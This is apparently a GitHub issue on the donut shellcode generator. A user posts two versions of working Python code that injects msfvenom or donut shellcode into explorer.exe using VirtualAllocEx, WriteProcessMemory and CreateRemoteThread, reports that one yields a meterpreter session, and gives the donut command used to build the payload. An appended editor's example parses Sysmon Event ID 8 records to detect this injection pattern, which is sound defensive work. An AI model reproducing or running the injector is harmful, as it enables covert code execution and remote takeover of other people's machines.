shellcode gen with error? #134

Closed
SirKnightV opened this issue Aug 31, 2023 · 0 comments

@SirKnightV

Hi, this is the code I'm testing:

import ctypes, os, subprocess
import psutil
prq = psutil.process_iter()
for proceso in prq:
    if proceso.name() == 'explorer.exe':
        pix = proceso.pid
    else:
        pass
shellcode = open('loader.bin', 'rb').read()
shellcode_length = len(shellcode)
process_handle = ctypes.windll.kernel32.OpenProcess(0xFFFF, False, pix)
memory_allocation_variable = ctypes.windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, 0x00001000, 0x40)
ctypes.windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
ctypes.windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)

I generated the shellcode in loader.bin by downloading the latest version of donut from Releases, then I executed the following command:

donut.exe -i msfvenompayload.exe -f bin -o loader.bin

Later I tried to execute this code, but I don't get any error; it just restarts the explorer.exe process. I have checked the API parameters at https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights and https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc to make sure everything seems correct, but when I try to execute it, it just doesn't show any error and restarts the explorer.exe process. But if I generate the shellcode directly from msfvenom and load it like this:

shellcode = b"..."  # msfvenom x64 payload bytes, omitted here

import ctypes, os, subprocess
import psutil
prq = psutil.process_iter()
for proceso in prq:
    if proceso.name() == 'explorer.exe':
        pix = proceso.pid
    else:
        pass
shellcode_length = len(shellcode)
process_handle = ctypes.windll.kernel32.OpenProcess(0xFFFF, False, pix)
memory_allocation_variable = ctypes.windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, 0x00001000, 0x40)
ctypes.windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
ctypes.windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)

When I execute this code it gives me a meterpreter session, but with the donut-generated shellcode it doesn't. What is wrong? Is it me, or is the donut tool bad? I hope someone can help me fix this, thanks :)
Note: When I try to generate donut shellcode with -f 5 for Python file output and try to load it, I get the same issue: the explorer.exe process restarts but no handler receives anything.
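Added here as an editor's example, not part of the issue or of donut: a small parser over constructed Sysmon Event ID 8 (CreateRemoteThread) records that flags the pattern the loader above produces on a monitored host, a scripting host creating a thread in explorer.exe whose start address is not backed by any loaded module. Field names follow Sysmon's Event ID 8 schema; the key=value record shape, the sample events and the SCRIPT_HOSTS list are assumptions made for the example.

```python
import re

# Constructed sample records in a flat key=value shape (not real telemetry);
# Sysmon leaves StartModule/StartFunction empty when the thread start address
# is not inside any loaded module, which is what injected shellcode looks like.
SAMPLE_EVENTS = [
    "EventID=8 SourceImage=C:\\Python311\\python.exe TargetImage=C:\\Windows\\explorer.exe "
    "StartAddress=0x000001E4A3F20000 StartModule= StartFunction=",
    "EventID=8 SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\Windows\\explorer.exe "
    "StartAddress=0x00007FFB1C2A5B40 StartModule=C:\\Windows\\System32\\ntdll.dll StartFunction=RtlUserThreadStart",
    "EventID=8 SourceImage=C:\\Python311\\python.exe TargetImage=C:\\Python311\\python.exe "
    "StartAddress=0x00007FFB1C2A5B40 StartModule=C:\\Windows\\System32\\ntdll.dll StartFunction=RtlUserThreadStart",
]

# Interpreters and script hosts that rarely have a legitimate reason to create
# threads in other processes (assumed list; tune per environment).
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Assumes values contain no spaces (true for the constructed records above).
FIELD_RE = re.compile(r"(\w+)=(\S*)")


def parse_event(line):
    """Turn one key=value record into a dict; an empty value becomes ''."""
    return dict(FIELD_RE.findall(line))


def is_suspicious(ev):
    """Remote thread from a script host into a different process whose start
    address is not backed by any module."""
    src_name = ev.get("SourceImage", "").rsplit("\\", 1)[-1].lower()
    same_process = ev.get("SourceImage", "").lower() == ev.get("TargetImage", "").lower()
    unbacked = ev.get("StartModule", "") == ""
    return ev.get("EventID") == "8" and src_name in SCRIPT_HOSTS and not same_process and unbacked


def find_injections(lines):
    """Return (SourceImage, TargetImage) pairs for every record that trips the rule."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_suspicious(ev):
            hits.append((ev["SourceImage"], ev["TargetImage"]))
    return hits


if __name__ == "__main__":
    for src, dst in find_injections(SAMPLE_EVENTS):
        print(f"remote thread with unbacked start address: {src} -> {dst}")
```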
